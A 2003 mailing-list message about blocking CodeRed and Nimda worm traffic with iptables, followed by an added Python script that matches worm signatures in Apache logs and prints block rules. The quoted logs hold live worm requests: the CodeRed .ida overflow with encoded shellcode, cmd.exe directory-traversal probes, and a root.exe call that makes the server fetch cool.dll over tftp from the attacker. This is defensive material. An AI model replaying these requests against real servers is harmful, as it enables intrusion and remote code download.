On Fri, 14 Mar 2003 16:50:15 -0800 Dave Laird <[EMAIL PROTECTED]> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Good evening, Pierre...
> 
> On Friday 14 March 2003 04:27 pm, Pierre Fortin wrote:
> 
> > On the _passive_ side, I have some ideas for short-circuiting Nimda
> > attacks with iptables.
> 
> [Dave sits upright in his chair from sleeping through the flame wars and
> wriggles with impatience] Are you referring to a thing I read a few
> weeks back about using "strings" in iptables to deflect Code Red? I've
> started a time or two to explore this in more detail, but if you have an
> idea that either does/does not follow that platform, I'm *ALL* ears. At
> least in principle the "strings" idea should work. 
> 
> Dave

Got a pointer to the "strings" stuff...?  I'm running 8.2 on my main
server (9.0 issues)...

The way I see it is this:

CodeRed is a single whack at my box from any IP address... I forget which
is V1 and V2; but I got 22 of these yesterday:
64.53.28.118 - - [13/Mar/2003:00:07:35 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a  HTTP/1.0" 200 538 "-" "-"

and only this one:
24.102.21.122 - - [13/Mar/2003:19:42:36 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a  HTTP/1.0" 400 347 "-" "-"

Nimda looks like this:
64.53.219.105 - - [13/Mar/2003:20:25:22 -0500] "GET /scripts/httpodbc.dll
HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:23 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-"
"-"
64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310 "-"
"-"
64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310 "-" "-"
64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.53.219.105 - - [13/Mar/2003:20:25:26 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.53.219.105 - - [13/Mar/2003:20:30:23 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 58 "-" "-"
64.53.219.105 - - [13/Mar/2003:20:30:23 -0500] "GET
/scripts/root.exe?/c+tftp%20-i%2064.53.219.105%20GET%20cool.dll%20httpodb
c.dll HTTP/1.0" 200 58 "-" "-"

or, the first time I've noticed, simply like this:
212.129.198.49 - - [13/Mar/2003:04:34:29 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 - "-"
"-"
212.129.198.49 - - [13/Mar/2003:04:34:30 -0500] "GET
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 -
"-" "-"


So...  not much to be done about CodeRed, other than an _active_ response
to try and shut down the offending process...  hopefully without harming
the attacker [too much]...

While Nimda may be similarly responded to, the alternative is to use a
_passive_ response... block subsequent packets with iptables...  This,
I've toyed with in several ways...  the one I prefer; but still need to
debug is having apache write $REMOTE_ADDR to a pipe which is connected to
a listener that can issue an immediate 'drop $REMOTE_ADDR 80', a script I
wrote -- and currently reworking -- which creates an iptables entry, and
saves the info for refreshing/reloading iptables after a reboot, etc...

Although, to keep the iptables short so as not to impact performance too
much, I'm moving towards blocking the Nimda packets for a few minutes,
then removing the block.

OOPPPPSSSS.....  doing a quick review of this msg, I just noticed for the
first time that the Nimda attack is not in the usual order...   looks like
my "bug" is not providing for all possibilities and using the first one to
arrive...  :^P  I've been focusing on "GET /scripts/root.exe"...

What have you tried in this matter?  Feel free to take this thread offline
-- we can summarize back...
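The passive scheme described in this message (match the worm's request in the Apache log, block the source on port 80 for a few minutes, then lift the block) and the ordering bug noticed at the end (Nimda does not always start with "GET /scripts/root.exe") are both covered by the following added example. It is not code from the thread or from either poster; it is a standalone Python sketch of the listener side. The log lines in it are constructed from the request shapes shown above (the CodeRed payload is truncated, and 192.0.2.10 is a made-up ordinary visitor), the five-minute hold is an assumed value, and the iptables commands are only generated as strings so the script can be run offline against a log file before anything is wired to a pipe.

```python
import re
from datetime import datetime, timedelta

# Apache access-log line: ip ident user [time] "METHOD URI PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Signatures taken from the request shapes in the thread. Any one of the
# Nimda probes is enough to identify the source, whatever order they arrive in,
# so the listener no longer depends on root.exe being the first request seen.
SIGNATURES = {
    "CodeRed": (re.compile(r"^/default\.ida\?", re.I),),
    "Nimda": (
        re.compile(r"/scripts/root\.exe", re.I),
        re.compile(r"/winnt/system32/cmd\.exe", re.I),
        re.compile(r"/scripts/httpodbc\.dll", re.I),
    ),
}

# Constructed sample log (modelled on the lines quoted in the message).
SAMPLE_LOG = [
    '64.53.28.118 - - [13/Mar/2003:00:07:35 -0500] "GET /default.ida?XXXX%u9090%u6858=a HTTP/1.0" 200 538 "-" "-"',
    '64.53.219.105 - - [13/Mar/2003:20:25:22 -0500] "GET /scripts/httpodbc.dll HTTP/1.0" 404 - "-" "-"',
    '64.53.219.105 - - [13/Mar/2003:20:25:23 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '64.53.219.105 - - [13/Mar/2003:20:30:23 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 58 "-" "-"',
    '192.0.2.10 - - [13/Mar/2003:20:31:00 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def classify(uri):
    """Return the worm name whose signature matches this URI, else None."""
    for worm, patterns in SIGNATURES.items():
        if any(p.search(uri) for p in patterns):
            return worm
    return None


def build_blocks(lines, hold=timedelta(minutes=5)):
    """Walk the log in order. The first matching request from an IP creates a
    block entry (worm, first_seen, expires); later hits from the same IP do not
    extend it, so the table stays short and entries age out on their own."""
    blocks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        worm = classify(rec["uri"])
        if worm and rec["ip"] not in blocks:
            blocks[rec["ip"]] = (worm, rec["ts"], rec["ts"] + hold)
    return blocks


def iptables_rules(blocks):
    """Insert/delete command pair per blocked IP, port 80 only. Returned as
    strings for review or logging; nothing here executes them."""
    rules = {}
    for ip in sorted(blocks):
        rule = f"-s {ip} -p tcp --dport 80 -j DROP"
        rules[ip] = (f"iptables -I INPUT {rule}", f"iptables -D INPUT {rule}")
    return rules


def expired(blocks, now):
    """IPs whose hold has run out at `now` and whose DROP rule can be removed."""
    return sorted(ip for ip, (_, _, exp) in blocks.items() if exp <= now)


if __name__ == "__main__":
    blocks = build_blocks(SAMPLE_LOG)
    for ip, (worm, first, exp) in blocks.items():
        print(f"{ip:15} {worm:8} first {first:%H:%M:%S} expires {exp:%H:%M:%S}")
    for add_cmd, del_cmd in iptables_rules(blocks).values():
        print(add_cmd)
        print(del_cmd)
```

Feed the script a real access log instead of SAMPLE_LOG and it lists which sources would have been blocked and when each block would have lifted, which is the "dry run" worth doing before the pipe listener is allowed to call iptables for real.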

